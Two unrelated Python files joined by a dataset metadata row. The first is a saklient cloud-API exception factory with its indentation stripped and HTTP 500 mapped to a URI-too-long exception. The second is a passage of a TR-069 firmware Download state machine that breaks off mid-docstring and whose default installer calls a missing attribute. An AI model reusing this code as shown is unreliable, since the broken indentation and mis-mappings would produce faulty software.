from ..cloud.errors.accessapikeydisabledexception import AccessApiKeyDisabledException
from ..cloud.errors.accesssakuraexception import AccessSakuraException
from ..cloud.errors.accessstaffexception import AccessStaffException
from ..cloud.errors.accesstokenexception import AccessTokenException
from ..cloud.errors.accessxhrorapikeyexception import AccessXhrOrApiKeyException
from ..cloud.errors.accountnotfoundexception import AccountNotFoundException
from ..cloud.errors.accountnotspecifiedexception import AccountNotSpecifiedException
from ..cloud.errors.ambiguousidentifierexception import AmbiguousIdentifierException
from ..cloud.errors.ambiguouszoneexception import AmbiguousZoneException
from ..cloud.errors.apiproxytimeoutexception import ApiProxyTimeoutException
from ..cloud.errors.apiproxytimeoutnongetexception import ApiProxyTimeoutNonGetException
from ..cloud.errors.archiveisincompleteexception import ArchiveIsIncompleteException
from ..cloud.errors.bootfailurebylockexception import BootFailureByLockException
from ..cloud.errors.bootfailureingroupexception import BootFailureInGroupException
from ..cloud.errors.busyexception import BusyException
from ..cloud.errors.cantresizesmallerexception import CantResizeSmallerException
from ..cloud.errors.cdromdevicelockedexception import CdromDeviceLockedException
from ..cloud.errors.cdromdisabledexception import CdromDisabledException
from ..cloud.errors.cdrominuseexception import CdromInUseException
from ..cloud.errors.cdromisincompleteexception import CdromIsIncompleteException
from ..cloud.errors.connecttosameswitchexception import ConnectToSameSwitchException
from ..cloud.errors.contractcreationexception import ContractCreationException
from ..cloud.errors.copytoitselfexception import CopyToItselfException
from ..cloud.errors.deletediskb4templateexception import DeleteDiskB4TemplateException
from ..cloud.errors.deleteipv6netsfirstexception import DeleteIpV6NetsFirstException
from ..cloud.errors.deleteresb4accountexception import DeleteResB4AccountException
from ..cloud.errors.deleterouterb4switchexception import DeleteRouterB4SwitchException
from ..cloud.errors.deletestaticroutefirstexception import DeleteStaticRouteFirstException
from ..cloud.errors.disabledinsandboxexception import DisabledInSandboxException
from ..cloud.errors.disconnectb4deleteexception import DisconnectB4DeleteException
from ..cloud.errors.disconnectb4updateexception import DisconnectB4UpdateException
from ..cloud.errors.diskconnectionlimitexception import DiskConnectionLimitException
from ..cloud.errors.diskiscopyingexception import DiskIsCopyingException
from ..cloud.errors.diskisnotavailableexception import DiskIsNotAvailableException
from ..cloud.errors.disklicensemismatchexception import DiskLicenseMismatchException
from ..cloud.errors.diskorssinmigrationexception import DiskOrSsInMigrationException
from ..cloud.errors.diskstockrunoutexception import DiskStockRunOutException
from ..cloud.errors.dnsarecordnotfoundexception import DnsARecordNotFoundException
from ..cloud.errors.dnsaaaarecordnotfoundexception import DnsAaaaRecordNotFoundException
from ..cloud.errors.dnsptrupdatefailureexception import DnsPtrUpdateFailureException
from ..cloud.errors.dontcreateinsandboxexception import DontCreateInSandboxException
from ..cloud.errors.duplicateaccountcodeexception import DuplicateAccountCodeException
from ..cloud.errors.duplicateentryexception import DuplicateEntryException
from ..cloud.errors.duplicateusercodeexception import DuplicateUserCodeException
from ..cloud.errors.filenotuploadedexception import FileNotUploadedException
from ..cloud.errors.filterarraycomparisonexception import FilterArrayComparisonException
from ..cloud.errors.filterbadoperatorexception import FilterBadOperatorException
from ..cloud.errors.filternullcomparisonexception import FilterNullComparisonException
from ..cloud.errors.filterunknownoperatorexception import FilterUnknownOperatorException
from ..cloud.errors.ftpcannotcloseexception import FtpCannotCloseException
from ..cloud.errors.ftpisalreadycloseexception import FtpIsAlreadyCloseException
from ..cloud.errors.ftpisalreadyopenexception import FtpIsAlreadyOpenException
from ..cloud.errors.ftpmustbeclosedexception import FtpMustBeClosedException
from ..cloud.errors.hostoperationfailureexception import HostOperationFailureException
from ..cloud.errors.illegaldasusageexception import IllegalDasUsageException
from ..cloud.errors.inmigrationexception import InMigrationException
from ..cloud.errors.invalidformatexception import InvalidFormatException
from ..cloud.errors.invalidparamcombexception import InvalidParamCombException
from ..cloud.errors.invalidrangeexception import InvalidRangeException
from ..cloud.errors.invaliduriargumentexception import InvalidUriArgumentException
from ..cloud.errors.ipv6netalreadyattachedexception import IpV6NetAlreadyAttachedException
from ..cloud.errors.limitcountinaccountexception import LimitCountInAccountException
from ..cloud.errors.limitcountinmemberexception import LimitCountInMemberException
from ..cloud.errors.limitcountinnetworkexception import LimitCountInNetworkException
from ..cloud.errors.limitcountinrouterexception import LimitCountInRouterException
from ..cloud.errors.limitcountinzoneexception import LimitCountInZoneException
from ..cloud.errors.limitmemoryinaccountexception import LimitMemoryInAccountException
from ..cloud.errors.limitsizeinaccountexception import LimitSizeInAccountException
from ..cloud.errors.missingisoimageexception import MissingIsoImageException
from ..cloud.errors.missingparamexception import MissingParamException
from ..cloud.errors.mustbeofsamezoneexception import MustBeOfSameZoneException
from ..cloud.errors.nodisplayresponseexception import NoDisplayResponseException
from ..cloud.errors.notforrouterexception import NotForRouterException
from ..cloud.errors.notreplicatingexception import NotReplicatingException
from ..cloud.errors.notwithhybridconnexception import NotWithHybridconnException
from ..cloud.errors.oldstorageplanexception import OldStoragePlanException
from ..cloud.errors.operationfailureexception import OperationFailureException
from ..cloud.errors.operationtimeoutexception import OperationTimeoutException
from ..cloud.errors.originalhashmismatchexception import OriginalHashMismatchException
from ..cloud.errors.packetfilterapplyingexception import PacketFilterApplyingException
from ..cloud.errors.packetfilterversionmismatchexception import PacketFilterVersionMismatchException
from ..cloud.errors.paramipnotfoundexception import ParamIpNotFoundException
from ..cloud.errors.paramresnotfoundexception import ParamResNotFoundException
from ..cloud.errors.paymentcreditcardexception import PaymentCreditCardException
from ..cloud.errors.paymentpaymentexception import PaymentPaymentException
from ..cloud.errors.paymentregistrationexception import PaymentRegistrationException
from ..cloud.errors.paymenttelcertificationexception import PaymentTelCertificationException
from ..cloud.errors.paymentunpayableexception import PaymentUnpayableException
from ..cloud.errors.penaltyoperationexception import PenaltyOperationException
from ..cloud.errors.replicaalreadyexistsexception import ReplicaAlreadyExistsException
from ..cloud.errors.replicanotfoundexception import ReplicaNotFoundException
from ..cloud.errors.resalreadyconnectedexception import ResAlreadyConnectedException
from ..cloud.errors.resalreadydisconnectedexception import ResAlreadyDisconnectedException
from ..cloud.errors.resalreadyexistsexception import ResAlreadyExistsException
from ..cloud.errors.resusedinzoneexception import ResUsedInZoneException
from ..cloud.errors.resourcepathnotfoundexception import ResourcePathNotFoundException
from ..cloud.errors.runoutofipaddressexception import RunOutOfIpAddressException
from ..cloud.errors.samelicenserequiredexception import SameLicenseRequiredException
from ..cloud.errors.servercouldnotstopexception import ServerCouldNotStopException
from ..cloud.errors.serveriscleaningexception import ServerIsCleaningException
from ..cloud.errors.serveroperationfailureexception import ServerOperationFailureException
from ..cloud.errors.serverpowermustbedownexception import ServerPowerMustBeDownException
from ..cloud.errors.serverpowermustbeupexception import ServerPowerMustBeUpException
from ..cloud.errors.servicetemporarilyunavailableexception import ServiceTemporarilyUnavailableException
from ..cloud.errors.sizemismatchexception import SizeMismatchException
from ..cloud.errors.snapshotinmigrationexception import SnapshotInMigrationException
from ..cloud.errors.stillcreatingexception import StillCreatingException
from ..cloud.errors.storageabnormalexception import StorageAbnormalException
from ..cloud.errors.storageoperationfailureexception import StorageOperationFailureException
from ..cloud.errors.switchhybridconnectedexception import SwitchHybridConnectedException
from ..cloud.errors.templateftpisopenexception import TemplateFtpIsOpenException
from ..cloud.errors.templateisincompleteexception import TemplateIsIncompleteException
from ..cloud.errors.toomanyrequestexception import TooManyRequestException
from ..cloud.errors.unknownexception import UnknownException
from ..cloud.errors.unknownostypeexception import UnknownOsTypeException
from ..cloud.errors.unsupportedresclassexception import UnsupportedResClassException
from ..cloud.errors.usernotspecifiedexception import UserNotSpecifiedException
from ..cloud.errors.vncproxyrequestfailureexception import VncProxyRequestFailureException
from ..util import Util
import saklient
str = six.text_type
# module saklient.errors.exceptionfactory
class ExceptionFactory(object):
## @static
# @param {int} status
# @param {str} code=None
# @param {str} message=""
# @return {saklient.errors.httpexception.HttpException}
@staticmethod
def create(status, code=None, message=""):
if code == "access_apikey_disabled":
return AccessApiKeyDisabledException(status, code, message)
elif code == "access_sakura":
return AccessSakuraException(status, code, message)
elif code == "access_staff":
return AccessStaffException(status, code, message)
elif code == "access_token":
return AccessTokenException(status, code, message)
elif code == "access_xhr_or_apikey":
return AccessXhrOrApiKeyException(status, code, message)
elif code == "account_not_found":
return AccountNotFoundException(status, code, message)
elif code == "account_not_specified":
return AccountNotSpecifiedException(status, code, message)
elif code == "ambiguous_identifier":
return AmbiguousIdentifierException(status, code, message)
elif code == "ambiguous_zone":
return AmbiguousZoneException(status, code, message)
elif code == "apiproxy_timeout":
return ApiProxyTimeoutException(status, code, message)
elif code == "apiproxy_timeout_non_get":
return ApiProxyTimeoutNonGetException(status, code, message)
elif code == "archive_is_incomplete":
return ArchiveIsIncompleteException(status, code, message)
elif code == "bad_gateway":
return HttpBadGatewayException(status, code, message)
elif code == "bad_request":
return HttpBadRequestException(status, code, message)
elif code == "boot_failure_by_lock":
return BootFailureByLockException(status, code, message)
elif code == "boot_failure_in_group":
return BootFailureInGroupException(status, code, message)
elif code == "busy":
return BusyException(status, code, message)
elif code == "cant_resize_smaller":
return CantResizeSmallerException(status, code, message)
elif code == "cdrom_device_locked":
return CdromDeviceLockedException(status, code, message)
elif code == "cdrom_disabled":
return CdromDisabledException(status, code, message)
elif code == "cdrom_in_use":
return CdromInUseException(status, code, message)
elif code == "cdrom_is_incomplete":
return CdromIsIncompleteException(status, code, message)
elif code == "conflict":
return HttpConflictException(status, code, message)
elif code == "connect_to_same_switch":
return ConnectToSameSwitchException(status, code, message)
elif code == "contract_creation":
return ContractCreationException(status, code, message)
elif code == "copy_to_itself":
return CopyToItselfException(status, code, message)
elif code == "delete_disk_b4_template":
return DeleteDiskB4TemplateException(status, code, message)
elif code == "delete_ipv6nets_first":
return DeleteIpV6NetsFirstException(status, code, message)
elif code == "delete_res_b4_account":
return DeleteResB4AccountException(status, code, message)
elif code == "delete_router_b4_switch":
return DeleteRouterB4SwitchException(status, code, message)
elif code == "delete_static_route_first":
return DeleteStaticRouteFirstException(status, code, message)
elif code == "disabled_in_sandbox":
return DisabledInSandboxException(status, code, message)
elif code == "disconnect_b4_delete":
return DisconnectB4DeleteException(status, code, message)
elif code == "disconnect_b4_update":
return DisconnectB4UpdateException(status, code, message)
elif code == "disk_connection_limit":
return DiskConnectionLimitException(status, code, message)
elif code == "disk_is_copying":
return DiskIsCopyingException(status, code, message)
elif code == "disk_is_not_available":
return DiskIsNotAvailableException(status, code, message)
elif code == "disk_license_mismatch":
return DiskLicenseMismatchException(status, code, message)
elif code == "disk_stock_run_out":
return DiskStockRunOutException(status, code, message)
elif code == "diskorss_in_migration":
return DiskOrSsInMigrationException(status, code, message)
elif code == "dns_a_record_not_found":
return DnsARecordNotFoundException(status, code, message)
elif code == "dns_aaaa_record_not_found":
return DnsAaaaRecordNotFoundException(status, code, message)
elif code == "dns_ptr_update_failure":
return DnsPtrUpdateFailureException(status, code, message)
elif code == "dont_create_in_sandbox":
return DontCreateInSandboxException(status, code, message)
elif code == "duplicate_account_code":
return DuplicateAccountCodeException(status, code, message)
elif code == "duplicate_entry":
return DuplicateEntryException(status, code, message)
elif code == "duplicate_user_code":
return DuplicateUserCodeException(status, code, message)
elif code == "expectation_failed":
return HttpExpectationFailedException(status, code, message)
elif code == "failed_dependency":
return HttpFailedDependencyException(status, code, message)
elif code == "file_not_uploaded":
return FileNotUploadedException(status, code, message)
elif code == "filter_array_comparison":
return FilterArrayComparisonException(status, code, message)
elif code == "filter_bad_operator":
return FilterBadOperatorException(status, code, message)
elif code == "filter_null_comparison":
return FilterNullComparisonException(status, code, message)
elif code == "filter_unknown_operator":
return FilterUnknownOperatorException(status, code, message)
elif code == "forbidden":
return HttpForbiddenException(status, code, message)
elif code == "ftp_cannot_close":
return FtpCannotCloseException(status, code, message)
elif code == "ftp_is_already_close":
return FtpIsAlreadyCloseException(status, code, message)
elif code == "ftp_is_already_open":
return FtpIsAlreadyOpenException(status, code, message)
elif code == "ftp_must_be_closed":
return FtpMustBeClosedException(status, code, message)
elif code == "gateway_timeout":
return HttpGatewayTimeoutException(status, code, message)
elif code == "gone":
return HttpGoneException(status, code, message)
elif code == "host_operation_failure":
return HostOperationFailureException(status, code, message)
elif code == "http_version_not_supported":
return HttpHttpVersionNotSupportedException(status, code, message)
elif code == "illegal_das_usage":
return IllegalDasUsageException(status, code, message)
elif code == "in_migration":
return InMigrationException(status, code, message)
elif code == "insufficient_storage":
return HttpInsufficientStorageException(status, code, message)
elif code == "internal_server_error":
return HttpInternalServerErrorException(status, code, message)
elif code == "invalid_format":
return InvalidFormatException(status, code, message)
elif code == "invalid_param_comb":
return InvalidParamCombException(status, code, message)
elif code == "invalid_range":
return InvalidRangeException(status, code, message)
elif code == "invalid_uri_argument":
return InvalidUriArgumentException(status, code, message)
elif code == "ipv6net_already_attached":
return IpV6NetAlreadyAttachedException(status, code, message)
elif code == "length_required":
return HttpLengthRequiredException(status, code, message)
elif code == "limit_count_in_account":
return LimitCountInAccountException(status, code, message)
elif code == "limit_count_in_member":
return LimitCountInMemberException(status, code, message)
elif code == "limit_count_in_network":
return LimitCountInNetworkException(status, code, message)
elif code == "limit_count_in_router":
return LimitCountInRouterException(status, code, message)
elif code == "limit_count_in_zone":
return LimitCountInZoneException(status, code, message)
elif code == "limit_memory_in_account":
return LimitMemoryInAccountException(status, code, message)
elif code == "limit_size_in_account":
return LimitSizeInAccountException(status, code, message)
elif code == "locked":
return HttpLockedException(status, code, message)
elif code == "method_not_allowed":
return HttpMethodNotAllowedException(status, code, message)
elif code == "missing_iso_image":
return MissingIsoImageException(status, code, message)
elif code == "missing_param":
return MissingParamException(status, code, message)
elif code == "must_be_of_same_zone":
return MustBeOfSameZoneException(status, code, message)
elif code == "no_display_response":
return NoDisplayResponseException(status, code, message)
elif code == "not_acceptable":
return HttpNotAcceptableException(status, code, message)
elif code == "not_extended":
return HttpNotExtendedException(status, code, message)
elif code == "not_for_router":
return NotForRouterException(status, code, message)
elif code == "not_found":
return HttpNotFoundException(status, code, message)
elif code == "not_implemented":
return HttpNotImplementedException(status, code, message)
elif code == "not_replicating":
return NotReplicatingException(status, code, message)
elif code == "not_with_hybridconn":
return NotWithHybridconnException(status, code, message)
elif code == "old_storage_plan":
return OldStoragePlanException(status, code, message)
elif code == "operation_failure":
return OperationFailureException(status, code, message)
elif code == "operation_timeout":
return OperationTimeoutException(status, code, message)
elif code == "original_hash_mismatch":
return OriginalHashMismatchException(status, code, message)
elif code == "packetfilter_applying":
return PacketFilterApplyingException(status, code, message)
elif code == "packetfilter_version_mismatch":
return PacketFilterVersionMismatchException(status, code, message)
elif code == "param_ip_not_found":
return ParamIpNotFoundException(status, code, message)
elif code == "param_res_not_found":
return ParamResNotFoundException(status, code, message)
elif code == "payment_creditcard":
return PaymentCreditCardException(status, code, message)
elif code == "payment_payment":
return PaymentPaymentException(status, code, message)
elif code == "payment_registration":
return PaymentRegistrationException(status, code, message)
elif code == "payment_required":
return HttpPaymentRequiredException(status, code, message)
elif code == "payment_telcertification":
return PaymentTelCertificationException(status, code, message)
elif code == "payment_unpayable":
return PaymentUnpayableException(status, code, message)
elif code == "penalty_operation":
return PenaltyOperationException(status, code, message)
elif code == "precondition_failed":
return HttpPreconditionFailedException(status, code, message)
elif code == "proxy_authentication_required":
return HttpProxyAuthenticationRequiredException(status, code, message)
elif code == "replica_already_exists":
return ReplicaAlreadyExistsException(status, code, message)
elif code == "replica_not_found":
return ReplicaNotFoundException(status, code, message)
elif code == "request_entity_too_large":
return HttpRequestEntityTooLargeException(status, code, message)
elif code == "request_timeout":
return HttpRequestTimeoutException(status, code, message)
elif code == "request_uri_too_long":
return HttpRequestUriTooLongException(status, code, message)
elif code == "requested_range_not_satisfiable":
return HttpRequestedRangeNotSatisfiableException(status, code, message)
elif code == "res_already_connected":
return ResAlreadyConnectedException(status, code, message)
elif code == "res_already_disconnected":
return ResAlreadyDisconnectedException(status, code, message)
elif code == "res_already_exists":
return ResAlreadyExistsException(status, code, message)
elif code == "res_used_in_zone":
return ResUsedInZoneException(status, code, message)
elif code == "resource_path_not_found":
return ResourcePathNotFoundException(status, code, message)
elif code == "run_out_of_ipaddress":
return RunOutOfIpAddressException(status, code, message)
elif code == "same_license_required":
return SameLicenseRequiredException(status, code, message)
elif code == "server_could_not_stop":
return ServerCouldNotStopException(status, code, message)
elif code == "server_is_cleaning":
return ServerIsCleaningException(status, code, message)
elif code == "server_operation_failure":
return ServerOperationFailureException(status, code, message)
elif code == "server_power_must_be_down":
return ServerPowerMustBeDownException(status, code, message)
elif code == "server_power_must_be_up":
return ServerPowerMustBeUpException(status, code, message)
elif code == "service_temporarily_unavailable":
return ServiceTemporarilyUnavailableException(status, code, message)
elif code == "service_unavailable":
return HttpServiceUnavailableException(status, code, message)
elif code == "size_mismatch":
return SizeMismatchException(status, code, message)
elif code == "snapshot_in_migration":
return SnapshotInMigrationException(status, code, message)
elif code == "still_creating":
return StillCreatingException(status, code, message)
elif code == "storage_abnormal":
return StorageAbnormalException(status, code, message)
elif code == "storage_operation_failure":
return StorageOperationFailureException(status, code, message)
elif code == "switch_hybrid_connected":
return SwitchHybridConnectedException(status, code, message)
elif code == "template_ftp_is_open":
return TemplateFtpIsOpenException(status, code, message)
elif code == "template_is_incomplete":
return TemplateIsIncompleteException(status, code, message)
elif code == "too_many_request":
return TooManyRequestException(status, code, message)
elif code == "unauthorized":
return HttpUnauthorizedException(status, code, message)
elif code == "unknown":
return UnknownException(status, code, message)
elif code == "unknown_os_type":
return UnknownOsTypeException(status, code, message)
elif code == "unprocessable_entity":
return HttpUnprocessableEntityException(status, code, message)
elif code == "unsupported_media_type":
return HttpUnsupportedMediaTypeException(status, code, message)
elif code == "unsupported_res_class":
return UnsupportedResClassException(status, code, message)
elif code == "upgrade_required":
return HttpUpgradeRequiredException(status, code, message)
elif code == "user_not_specified":
return UserNotSpecifiedException(status, code, message)
elif code == "variant_also_negotiates":
return HttpVariantAlsoNegotiatesException(status, code, message)
elif code == "vnc_proxy_request_failure":
return VncProxyRequestFailureException(status, code, message)
if status == 400:
return HttpBadRequestException(status, code, message)
elif status == 401:
return HttpUnauthorizedException(status, code, message)
elif status == 402:
return HttpPaymentRequiredException(status, code, message)
elif status == 403:
return HttpForbiddenException(status, code, message)
elif status == 404:
return HttpNotFoundException(status, code, message)
elif status == 405:
return HttpMethodNotAllowedException(status, code, message)
elif status == 406:
return HttpNotAcceptableException(status, code, message)
elif status == 407:
return HttpProxyAuthenticationRequiredException(status, code, message)
elif status == 408:
return HttpRequestTimeoutException(status, code, message)
elif status == 409:
return HttpConflictException(status, code, message)
elif status == 410:
return HttpGoneException(status, code, message)
elif status == 411:
return HttpLengthRequiredException(status, code, message)
elif status == 412:
return HttpPreconditionFailedException(status, code, message)
elif status == 413:
return HttpRequestEntityTooLargeException(status, code, message)
elif status == 415:
return HttpUnsupportedMediaTypeException(status, code, message)
elif status == 416:
return HttpRequestedRangeNotSatisfiableException(status, code, message)
elif status == 417:
return HttpExpectationFailedException(status, code, message)
elif status == 422:
return HttpUnprocessableEntityException(status, code, message)
elif status == 423:
return HttpLockedException(status, code, message)
elif status == 424:
return HttpFailedDependencyException(status, code, message)
elif status == 426:
return HttpUpgradeRequiredException(status, code, message)
elif status == 500:
return HttpRequestUriTooLongException(status, code, message)
elif status == 501:
return HttpNotImplementedException(status, code, message)
elif status == 502:
return HttpBadGatewayException(status, code, message)
elif status == 503:
return HttpServiceUnavailableException(status, code, message)
elif status == 504:
return HttpGatewayTimeoutException(status, code, message)
elif status == 505:
return HttpHttpVersionNotSupportedException(status, code, message)
elif status == 506:
return HttpVariantAlsoNegotiatesException(status, code, message)
elif status == 507:
return HttpInsufficientStorageException(status, code, message)
elif status == 510:
return HttpNotExtendedException(status, code, message)
return HttpException(status, code, message)
| mit | -3,158,773,387,428,685,300 | 59.754717 | 104 | 0.747857 | false |
ankurjimmy/catawampus | tr/download.py | 5 | 18628 | #!/usr/bin/python
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handlers for tr-69 Download and Scheduled Download."""
__author__ = 'dgentry@google.com (Denton Gentry)'
import collections
import datetime
import errno
import os
import shutil
import time
import urlparse
import google3
import tornado
import tornado.httpclient
import tornado.ioloop
import tornado.web
import core
import helpers
import http_download
import persistobj
# Persistent object storage filename
DNLDROOTNAME = 'tr69_dnld'
BOOTROOTNAME = 'tr69_boot'
class Installer(object):
"""Install a downloaded image and reboot.
This default implementation returns an error response. Platforms are
expected to implement their own Install object, and set
tr.download.INSTALLER = their object.
"""
def install(self, file_type, target_filename, callback):
INTERNAL_ERROR = 9002
self.callback(faultcode=INTERNAL_ERROR,
faultstring='No installer for this platform.',
must_reboot=False)
def reboot(self):
return False
# Class to be called after image is downloaded. Platform code is expected
# to put its own installer here, the default returns failed to install.
INSTALLER = Installer
# Unit tests can substitute mock objects here
DOWNLOAD_CLIENT = {
'http': http_download.HttpDownload,
'https': http_download.HttpDownload
}
# State machine description. Generate a diagram using Graphviz:
# ./download.py
graphviz = r"""
digraph DLstates {
node [shape=box]
START [label="START"]
WAITING [label="WAITING\nstart timer"]
DOWNLOADING [label="DOWNLOADING\nstart download"]
INSTALLING [label="INSTALLING\nstart install"]
REBOOTING [label="REBOOTING\ninitiate reboot"]
EXITING [label="EXITING\nsend TransferComplete"]
DONE [label="DONE\ncleanup, not a\nreal state"]
START -> WAITING
WAITING -> DOWNLOADING [label="timer\nexpired"]
DOWNLOADING -> INSTALLING [label="download\ncomplete"]
DOWNLOADING -> EXITING [label="download\nfailed"]
INSTALLING -> REBOOTING [label="install\ncomplete"]
INSTALLING -> EXITING [label="install\nfailed"]
INSTALLING -> EXITING [label="must_reboot=False"]
REBOOTING -> EXITING [label="rebooted,\ncorrect image"]
REBOOTING -> EXITING [label="rebooted,\nincorrect image"]
EXITING -> DONE [label="receive\nTransferCompleteResponse"]
}
"""
class Download(object):
"""A state machine to handle a single tr-69 Download RPC."""
# States in the state machine. See docs/download.dot for details
START = 'START'
WAITING = 'WAITING'
DOWNLOADING = 'DOWNLOADING'
INSTALLING = 'INSTALLING'
REBOOTING = 'REBOOTING'
EXITING = 'EXITING'
# State machine events
EV_START = 1
EV_TIMER = 2
EV_DOWNLOAD_COMPLETE = 3
EV_INSTALL_COMPLETE = 4
EV_REBOOT_COMPLETE = 5
EV_TCRESPONSE = 6
def __init__(self, stateobj, transfer_complete_cb,
download_dir=None, ioloop=None):
"""Download object.
Args:
stateobj: a PersistentObject to store state across reboots.
This class requires that command_key and url attributes be present.
transfer_complete_cb: function to send a TransferComplete message.
ioloop: Tornado ioloop. Unit tests can pass in a mock.
"""
self.stateobj = self._restore_dlstate(stateobj)
self.transfer_complete_cb = transfer_complete_cb
self.download_dir = download_dir
self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
self.download = None
self.downloaded_fileobj = None
self.downloaded_file = None
self.wait_handle = None
# the delay_seconds started when we received the RPC, even if we have
# downloaded other files and rebooted since then.
if not hasattr(self.stateobj, 'wait_start_time'):
self.stateobj.Update(wait_start_time=time.time())
def CommandKey(self):
return getattr(self.stateobj, 'command_key', None)
def _restore_dlstate(self, stateobj):
"""Re-enter the state machine at a sane state.
This state machine is supposed to download a file, install that file,
reboot, and send a completion. To do this it stores its state to
the filesystem so it can read it back in after a reboot.
If we reboot unexpectedly, like a power failure, we may have to backtrack.
For example if we had downloaded the file to /tmp and then powered off,
we lose the file and have to download it again.
The state machine can only resume into the START and REBOOTING states.
Args:
stateobj: the PersistentObject for this transfer
Returns:
the stateobj
"""
if not hasattr(stateobj, 'dlstate'):
stateobj.Update(dlstate=self.START)
dlstate = stateobj.dlstate
if dlstate == self.REBOOTING or dlstate == self.EXITING:
stateobj.Update(dlstate=self.REBOOTING)
else:
stateobj.Update(dlstate=self.START)
return stateobj
def _schedule_timer(self):
delay_seconds = getattr(self.stateobj, 'delay_seconds', 0)
now = time.time()
wait_start_time = self.stateobj.wait_start_time
# sanity checks
if wait_start_time > now:
wait_start_time = now
when = wait_start_time + delay_seconds
if when < now:
when = now
self.wait_handle = self.ioloop.add_timeout(
datetime.timedelta(seconds=when-now),
self.timer_callback)
def _new_download_object(self, stateobj):
url = getattr(stateobj, 'url', '')
username = getattr(stateobj, 'username', None)
password = getattr(stateobj, 'password', None)
o = urlparse.urlparse(url)
client = DOWNLOAD_CLIENT[o.scheme]
return client(url=url, username=username, password=password,
download_complete_cb=self.download_complete_callback,
download_dir=self.download_dir)
def _send_transfer_complete(self, faultcode, faultstring, start=0.0, end=0.0):
event_code = getattr(self.stateobj, 'event_code', 'M Download')
self.transfer_complete_cb(dl=self,
command_key=self.stateobj.command_key,
faultcode=faultcode,
faultstring=faultstring,
starttime=start, endtime=end,
event_code=event_code)
def state_machine(self, event, faultcode=0, faultstring='',
downloaded_file=None, must_reboot=False):
dlstate = self.stateobj.dlstate
if dlstate == self.START:
if event == self.EV_START or event == self.EV_REBOOT_COMPLETE:
self.stateobj.Update(dlstate=self.WAITING)
self._schedule_timer()
elif dlstate == self.WAITING:
if event == self.EV_TIMER:
self.download = self._new_download_object(self.stateobj)
self.stateobj.Update(dlstate=self.DOWNLOADING,
download_start_time=time.time())
self.download.fetch()
# TODO(dgentry) : need a timeout, in case download never finishes.
elif dlstate == self.DOWNLOADING:
if event == self.EV_DOWNLOAD_COMPLETE:
self.download = None # no longer needed
if faultcode == 0:
self.installer = INSTALLER(downloaded_file)
self.stateobj.Update(dlstate=self.INSTALLING)
file_type = getattr(self.stateobj, 'file_type', None)
target_filename = getattr(self.stateobj, 'target_filename', None)
self.installer.install(file_type=file_type,
target_filename=target_filename,
callback=self.installer_callback)
else:
self.stateobj.Update(dlstate=self.EXITING)
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.INSTALLING:
if event == self.EV_INSTALL_COMPLETE:
if self.downloaded_file:
helpers.Unlink(self.downloaded_file)
if faultcode == 0:
if must_reboot:
self.stateobj.Update(dlstate=self.REBOOTING)
self.installer.reboot()
else:
end = time.time()
self.stateobj.Update(dlstate=self.EXITING,
download_complete_time=end)
start = getattr(self.stateobj, 'download_start_time', 0.0)
self._send_transfer_complete(faultcode=0, faultstring='',
start=start, end=end)
else:
self.stateobj.Update(dlstate=self.EXITING)
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.REBOOTING:
if event == self.EV_REBOOT_COMPLETE:
# TODO(dgentry) check version, whether image was actually installed
end = time.time()
self.stateobj.Update(dlstate=self.EXITING, download_complete_time=end)
if faultcode == 0:
start = getattr(self.stateobj, 'download_start_time', 0.0)
self._send_transfer_complete(faultcode=0, faultstring='',
start=start, end=end)
else:
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.EXITING:
pass
def do_start(self):
return self.state_machine(self.EV_START)
def timer_callback(self):
"""Called by timer code when timeout expires."""
return self.state_machine(self.EV_TIMER)
def download_complete_callback(self, faultcode, faultstring, tmpfile):
print 'Download complete callback.'
name = tmpfile and tmpfile.name or None
self.downloaded_fileobj = tmpfile # keep this around or it auto-deletes
self.downloaded_file = name
return self.state_machine(self.EV_DOWNLOAD_COMPLETE,
faultcode, faultstring,
downloaded_file=name)
def installer_callback(self, faultcode, faultstring, must_reboot):
return self.state_machine(self.EV_INSTALL_COMPLETE, faultcode, faultstring,
must_reboot=must_reboot)
def reboot_callback(self, faultcode, faultstring):
return self.state_machine(self.EV_REBOOT_COMPLETE, faultcode, faultstring)
def cleanup(self):
"""Attempt to stop all activity and clean up resources.
Returns:
False - successfully stopped and cleaned up
string - the reason download cannot be safely cancelled right now.
"""
dlstate = self.stateobj.dlstate
if dlstate == self.INSTALLING:
return 'Download is currently installing to flash'
if dlstate == self.REBOOTING:
return 'Download has been installed, awaiting reboot'
if self.wait_handle:
self.ioloop.remove_timeout(self.wait_handle)
self.wait_handle = None
if self.download:
self.download.close()
self.download = None
self.stateobj.Delete()
def get_queue_state(self):
"""Data needed for GetQueuedTransfers/GetAllQueuedTransfers RPC."""
q = collections.namedtuple(
'queued_transfer_struct',
('CommandKey State IsDownload FileType FileSize TargetFileName'))
q.CommandKey = self.stateobj.command_key
dlstate = self.stateobj.dlstate
if dlstate == self.START or dlstate == self.WAITING:
qstate = 1 # Not yet started
elif dlstate == self.EXITING:
qstate = 3 # Completed, finishing cleanup
else:
qstate = 2 # In progress
q.State = qstate
q.IsDownload = True
q.FileType = getattr(self.stateobj, 'file_type', None)
q.FileSize = getattr(self.stateobj, 'file_size', 0)
q.TargetFileName = getattr(self.stateobj, 'target_filename', '')
return q
# Object to track an individual Download RPC. Unit tests can override this.
DOWNLOADOBJ = Download
class DownloadManager(object):
"""Manage Download requests from the ACS.
Each RPC gets a Download object, which runs a state machine to track
the progress of the operation. The DownloadManager allocates, manages
and deletes the active Download objects.
SPEC: http://www.broadband-forum.org/technical/download/TR-069_Amendment-3.pdf
"""
# Maximum simultaneous downloads. tr-69 requires minimum of 3.
MAXDOWNLOADS = 1
def __init__(self, ioloop=None):
self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
self._downloads = list()
self._pending_complete = list()
self.config_dir = '/tmp/'
self.download_dir = '/tmp/'
# Function to send RPCs, to be filled in by parent object.
self.send_transfer_complete = None
def NewDownload(self, command_key=None, file_type=None, url=None,
username=None, password=None, file_size=0,
target_filename=None, delay_seconds=0):
"""Initiate a new download, handling a tr-69 Download RPC.
Args:
